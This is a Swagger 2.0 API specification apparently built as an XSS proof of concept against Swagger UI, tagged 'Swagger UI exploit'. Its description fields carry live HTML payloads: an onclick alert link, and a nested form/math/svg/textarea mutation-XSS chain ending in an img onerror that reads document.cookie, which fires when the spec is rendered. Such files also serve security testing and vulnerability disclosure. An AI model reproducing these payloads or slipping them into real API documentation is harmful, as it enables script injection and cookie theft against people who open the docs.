---
swagger: '2.0'
info:
  title: XSS API Vulnerability
  description: |
    <a onclick=alert(1) href="#">Read Me!</a>

  version: production
basePath: https://target.com
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
  "/w4tch3r":
    get:
      responses:
        '200':
          description: No response was specified
      tags:
      - Mathis Pais De Sousa
      operationId: findAccounts
      summary: this is example text
  "/exploited_by_w4tch3r":
    delete:
      parameters:
      - description: |
          <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>

        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - Swagger UI exploit
      operationId: afine
      summary: afine
    get:
      parameters:
      - description: this is example text
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - Swagger UI exploit
      operationId: some_operation
      summary: this is example text
